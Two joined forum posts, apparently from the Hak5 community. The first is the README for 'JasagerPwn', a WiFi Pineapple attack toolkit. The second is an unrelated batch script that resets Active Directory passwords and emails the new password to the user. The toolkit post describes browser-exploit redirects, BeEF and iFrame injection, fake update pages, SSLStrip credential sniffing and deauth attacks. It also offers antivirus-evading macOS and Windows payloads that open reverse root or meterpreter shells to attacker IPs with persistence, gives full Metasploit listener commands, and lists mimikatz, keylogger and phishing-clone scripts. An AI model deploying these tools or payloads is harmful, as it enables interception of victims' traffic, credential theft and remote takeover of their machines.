Search the Community

Disclaimer: This script is intended for LEGAL purposes ONLY. By downloading the following material you agree that the intended use of the previously mentioned is for LEGAL and NON-MALICIOUS purposes ONLY. This means while gaining client side exploits, you have the correct documentation and permissions to do so in accordance with all US and International laws and regulations. Nor I nor any associates at Hak5 condone misuse of this code or its features. Responsibility Disclosure: Hak5 has no affiliation with this code base. This code is not reviewed or verified by Hak5; therefore they do not take any responsibility for any of this code and its functionality. If you are paranoid (good!) - then look over the code yourself to be safe. Description This script is intended to increase attack vector consistency and stability by automating the process. For penetration testers, the most important thing is having a stable and well prepared attack vector - because you only get one chance. This script provides exactly that, a way to prepare and automate advanced and complex attack vectors in the lab, and then use them in the field. Compatibility / Troubleshooting Script Requirements: Pineapple [MK4 3.0.0] [MK5 1.0.0] - Debian based Linux. Tested Configuration: Pineapple MK5 1.0.0, Crunchbang Linux | Kali Linux Battery - Pineapple (Router: wlan0 | ICS: wlan1) -> Alfa (DeAuth) Attacker IPs: (2 man red-team) - 172.16.42.2 172.16.42.3 Configuration Picture: Setting up the Script: Open up jasagerPwn in your favorite text editor. Look over all the variables in this file and read my comments; they should clearly explain what is what.Adjust the variables based on your pineapple setup. If anything is unclear, feel free to ask me and I can clarify. After you setup the script, connect to a stable internet connection and run the script - this will prompt you to install dependencies. This will take a few minutes, after that is completed you can connect to the pineapples network (either via wireless or ethernet) and relaunch the script. Thats it. You should be able to use the attack modules. Dependencies Installation: Dependencies will attempt to install automatically if they are not detected on your system, f this fails for you - please look at the src/system_modules/dependencies.sh and just install it yourself. I've tested installation processes on Debian, Crunchbang, and Kali Linux. Infusion dependencies are also required for attack modules. Please refer to the list of attack modules below and their corresponding "Requirements". Included Attack Vector Modules browserPwn - Redirect LAN to Metasloits auxiliary module browser_autopwn. This will be detected by AV. Victim Support: Mac OSX, Windows, Linux. Requirements: Metasploit, DNSSpoof Infusion browserPwn iFrame - Inject an invisible iFrame into the victims browsing session that points to metasploit browser_autopwn. Victim Support: Mac OSX, Windows, Linux. Requirements: Metasploit, Strip-N-Inject Infusion ​BeEf - Inject a BeEf JavaScript hook transparently into victims browsing sessions. This is a form of Man-in-the-browser and will not be detected by AV.​Victim Support: Mac OSX, Windows, Linux Requirements: Strip-N-Inject Infusion Fake Update - Redirect LAN to a realistic fake update page with a [custom] payload download. Victim Support: Mac OSX, Windows. Requirements: Metasploit, DNSSpoof Infusion Click Jacking - Hijack the entire DOM with an injected <div>. No matter where you click, it downloads a payload. Victim Support: Mac OSX, Windows. Requirements: Metasploit, Strip-N-Inject Infusion Java Applet Injection - Transparently injects an OS agnostic java applet into the victims browsing session. Victim Support: Mac OSX, Windows, Linux. Requirements: Metasploit, Strip-N-Inject Infusion Java Applet Redirect - Redirects users to a Java page with an OS agnostic java applet payload. Victim Support: Mac OSX, Windows, Linux. Requirements: Metasploit, DNSSpoof Infusion SSLStrip - Remove SSL from the victims connections and sniff credentials. Victim Support: Mac OSX, Windows, Linux. Requirements: SSLStrip Infusion Aireplay-ng [local] - DoS APs and try to make them join yours via custom aireplay-ng script on the attacker machine. This script will run aireplay-ng against the AP broadcast, note that this works best if you are closer to the AP than the client MDK3 [local] - Deauths nearby clients from their APs and try to make them join yours via MDK3 from the attacker machine. This script will run MDK3 to deauthenticate clients from an AP directly note that this works best if you are close to the clients. As a result, this will have slightly better average range effectiveness. Included Payloads (w/ Source & Documentation) I have included some of my most successful and efficient payloads for your use. One for Mac OSX, and one for Windows - both will completely bypass signature based anti-virus and most behavioral HIPS as well. Apple_MacOSX_Update.pkg Description: This is 4 lines of BASH stuck in an apple postinstall script. No signature AV can ever detect this because it uses system commands and contains no binaries in the package. This will spawn 2 root shells to the following addresses: 172.16.42.2 6446 172.16.42.3 6446 Persistence: It will also add a persistent backdoor that will spawn these 2 every 3 minutes (sudo crontab -l) Metasploit Listener: use exploit/multi/handler set PAYLOAD generic/shell_reverse_tcp set LHOST 0.0.0.0 set LPORT 6446 set ExitOnSession false set AutoRunScript "" exploit -j powershell-https.exe Description: This is an implementation of "Invoke-Shellcode" from Matthew Graeber's PowerSploit modules. It was stripped down then minified and implemented into a standalone python script then compiled into an executable. It is not detect at the time of this writing. If the signature becomes detected, just make a new one. This will spawn 2 meterpreter shells to the following addresses: 172.16.42.2 587 172.16.42.3 587 Persistence: It will also add a persistent backdoor to Windows that will these 2 shells every 3 minutes (schtasks /query /tn winupdate) Metasploit Listener: use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_https set LHOST 0.0.0.0 set LPORT 587 set SessionCommunicationTimeout 0 set ExitOnSession false set EXITFUNC process set AutoRunScript "" exploit -j shellcode-tcp.exe Description: This is a windows meterpreter shell that was encoded into base 64, embedded into a python script that preforms basic shellcode execution, and then compiled into an executable. It is not detect at the time of this writing. If the signature becomes detected, just make a new one with some random data in it. This will spawn 2 meterpreter shells to the following addresses: 172.16.42.2 587 172.16.42.3 587 Persistence: It will also add a persistent backdoor to Windows that will these 2 shells every 3 minutes (schtasks /query /tn winupdate) Metasploit Listener: use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 0.0.0.0 set LPORT 587 set ExitOnSession false set EXITFUNC thread set AutoRunScript "migrate -f -k" exploit -j Included Resources I have included a few resources that I find useful on pentests with the pineapple. Metasploit Scripts: These are resource scripts that can be executed from msfconsole or in meterpreter. Creates a nice way to automate post-exploitation at your fingertips. In order to run them use "resource resources/metaspoit_scripts/file_collector.rc". file_collector.rc: Automatically search for documents on the system and download them. enum_app_data.rc: Enumerate passwords and other data from browsers, putty, etc. keylog_recorder.rc: Start a keylogger that will poll and automatically collect keystokes. You can use this then CTRL+Z to background the session. mimikatz.rc: Dump cleartext passwords from memory. Hashses are great, but why deal with cracking when they are sitting in memory in clear text? payload_inject.rc: Inject a meterpreter session into explorer.exe. This is like "duplicate" but you can send it to your red-team and not ever drop a binary on the system. listeners.rc: This is useful for the other members of the red-team not running JasagerPwn. They can just "msfconsole -r listeners.rc" and be ready to receive shells web_clone.sh: This is a simple wget command that I love to use to clone websites for phishing. It will put everything into a single index.html file.Note: If you're preforming a MITM attack then you need to download all the resources that are hot-linked in index.html and then modify them to local, relative paths. This can be tedious but is what I have used to do every template in JasagerPwn airdrop-ng: This was an airdrop-ng attack module that I made before MDK3. I think MDK3 works better so I took it out and plopped it here. Developing Attack Modules This script was created in a modular architecture, allowing for relatively simple expansion of attack vectors. Use the "attack_module_example.sh" located in the resources directory for an example reference. There are just a few requirements when developing the modules: If you're making a local de-authentication module - use "deauth" or "dos" in the description string. You must have a "start_myname" and "stop_myname" function in that format (myname is arbitrary). You must have a unique "title", "description", and "bindings" variables. I recommend editing the src/system_modules/utility.sh - cleanup() function to cleanup after your module. Module Submission: If you develop an attack module that you would like to have added into JasagerPwn, that is great! Just let me know and send me the code. If its a good idea; I'll code review it and add it into the script. Questions / Problems Google Code: https://code.google.com/p/jasagerpwn-reborn/ Bug Submission: https://code.google.com/p/jasagerpwn-reborn/issues/entry Changelog: https://code.google.com/p/jasagerpwn-reborn/source/list Questions: Feel free to ask here or in IRC (irc.hak5.org #pineapple). Download / Update Download via Subversion (sudo apt-get install subversion): svn checkout http://jasagerpwn-reborn.googlecode.com/svn/trunk/ jasagerPwn-Reborn Update Script to Latest Revision: ./jasagerPwn -u Enjoy!

Hi all, Here's a nice script, entirely in a batch file, that ; Prompts for input of a user's Full Name and Email Address Sets their password to a random string of uppercase, lowercase and numerical characters. Generates an email to send to them, with their new password. Notes; Length of the password can be set using the line Set _RNDLength= Whether user has to reset their password on logging in can be set with -mustchpwd Amend OU= and DC= for your own companie's domain. @echo off :Start endlocal echo. echo This script will reset the password for a user, using their Full Name, echo and then generate the email to be sent to them. echo. echo Passwords are automatically set as 10 digits, using lowercase, echo uppercase and numbers. echo. echo. echo. set /p "DisplayName= Full Name : %=%" echo. echo. set /p "EmailAddress= Email : %=%" cls Setlocal EnableDelayedExpansion Set _RNDLength=10 Set _Alphanumeric=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 Set _Str=%_Alphanumeric%987654321 :_LenLoop IF NOT "%_Str:~18%"=="" SET _Str=%_Str:~9%& SET /A _Len+=9& GOTO :_LenLoop SET _tmp=%_Str:~9,1% SET /A _Len=_Len+_tmp SET _count=0 SET _RndAlphaNum= :_loop SET /a _count+=1 SET _RND=%Random% SET /A _RND=_RND%%%_Len% SET _RndAlphaNum=!_RndAlphaNum!!_Alphanumeric:~%_RND%,1! If !_count! lss %_RNDLength% goto _loop dsmod user "CN=%DisplayName%,OU=[OU],DC=[DC],DC=co,DC=uk" -pwd !_RndAlphaNum! -mustchpwd no IF ERRORLEVEL 0 ( GOTO SendEmail ) ELSE ( echo. echo Failed. echo. Pause GOTO Start ) :SendEmail start "" "mailto:%EmailAddress%?subject=Password%%20Reset&body=Hello,%%0D%%0A%%0D%%0AYour%%20AD%%20password%%20has%%20been%%20reset%%20to%%20!_RndAlphaNum!%%0D%%0A%%0D%%0AKind Regards,%%0D%%0A%%0D%%0AYour%%20Name" cls GOTO Start Email generated looks like this; Hello, Your AD password has been reset to kD5Xjfd8A6 Kind Regards, Your Name This saves me some time at work when we get loads of emails asking for password resets for AD accounts. Takes 30 seconds instead of a few minutes.